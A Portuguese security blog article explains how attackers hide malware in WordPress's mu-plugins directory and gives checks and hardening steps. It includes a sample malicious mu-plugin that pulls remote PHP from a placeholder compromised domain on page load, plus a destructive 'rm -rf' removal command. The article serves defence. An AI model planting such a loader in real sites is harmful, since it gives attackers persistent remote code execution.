Dolutech

Hackers Estão Usando o Diretório mu-plugins para Injetar Malwares em Sites WordPress

A comunidade WordPress vem enfrentando uma nova onda de ataques direcionados ao diretório mu-plugins (Must-Use Plugins). Hackers estão explorando essa funcionalidade pouco conhecida, porém poderosa, para injetar malwares de forma silenciosa e persistente em sites WordPress.

Esse tipo de ataque passa despercebido por muitos administradores, pois os plugins do diretório mu-plugins não aparecem na área de plugins do painel administrativo, o que os torna um vetor perfeito para atividades maliciosas.

Neste artigo do Blog Dolutech, você entenderá:

image
mu-plugins

O que é o diretório mu-plugins?

O diretório mu-plugins, sigla para Must-Use Plugins, é uma funcionalidade nativa do WordPress introduzida para permitir que plugins sejam executados automaticamente sem poderem ser desativados via painel administrativo.

Características:

Infelizmente, esse recurso também pode ser explorado por cibercriminosos para inserir código malicioso que se executa silenciosamente em segundo plano.

Como Hackers Estão Explorando o mu-plugins

Vetores de Ataque Comuns:

  1. Invasão Inicial: via plugins vulneráveis, temas desatualizados ou senhas fracas.
  2. Upload do Código Malicioso: o invasor envia um arquivo PHP para o diretório mu-plugins.
  3. Execução Automática: o código é carregado pelo WordPress assim que o site é acessado.
  4. Persistência: mesmo que o administrador limpe os plugins normais, o malware permanece escondido no mu-plugins.
  5. Funções Maliciosas: envio de SPAM, redirecionamentos, mineração de criptomoedas, injeção de backdoors, roubo de credenciais.

Exemplo de malware no mu-plugins:

<?php
// mu-plugin malicioso
add_action('init', function() {
    if (!is_admin()) {
        include_once("https://dominio-comprometido.com/malware.php");
    }
});

Indícios de Comprometimento via mu-plugins

Guia de Verificação Completa do mu-plugins

1. Verifique a existência do diretório

ls -la wp-content/mu-plugins

Se o diretório não existir, ótimo. Mas se existir, você precisa verificar o conteúdo manualmente.

Lembre-se que o mu-plugins é amplamente usado para funções de plugins de manutenção de sites como por exemplo o famoso plugin ManageWP.

2. Analise o conteúdo

Revise todos os arquivos no diretório mu-plugins.

cat wp-content/mu-plugins/nome-do-arquivo.php

Desconfie de:

3. Valide com antivírus e ferramentas de varredura

Utilize ferramentas de segurança para escanear:

4. Monitore alterações no diretório

Configure uma ferramenta como:

inotifywait -m -r wp-content/mu-plugins

Ou use plugins como:

omo se Proteger Contra Injeções em mu-plugins

1. Restrinja permissões do diretório

Evite que qualquer processo PHP possa gravar diretamente nesse diretório:

chmod -R 755 wp-content/mu-plugins
chown -R root:www-data wp-content/mu-plugins

Opcionalmente, remova o diretório se não estiver em uso:

rm -rf wp-content/mu-plugins

2. Bloqueie uploads maliciosos com .htaccess (Apache)

Crie ou edite o arquivo .htaccess dentro de wp-content/mu-plugins/:

<Files *.php>
  Order allow,deny
  Deny from all
</Files>

3. Utilize WAF (Web Application Firewall)

Ferramentas como:

podem bloquear uploads não autorizados e injeções de código.

4. Automatize auditorias com WP-CLI

Execute regularmente:

wp plugin list
wp eval-file wp-content/mu-plugins/checar.php

E gere hashes de integridade para monitoramento:

sha256sum wp-content/mu-plugins/* > mu-plugins-hashes.txt

Recomendações Finais da Dolutech

Conclusão

O uso malicioso do diretório mu-plugins é uma técnica sorrateira, mas poderosa, empregada por cibercriminosos para comprometer sites WordPress sem serem detectados. Por não aparecer no painel de administração, muitos administradores sequer imaginam que podem estar infectados.

A Dolutech recomenda monitoramento contínuo, inspeção manual desse diretório e adoção de medidas preventivas imediatas. Manter-se informado e proativo é a chave para manter sua aplicação segura.

Sair da versão mobile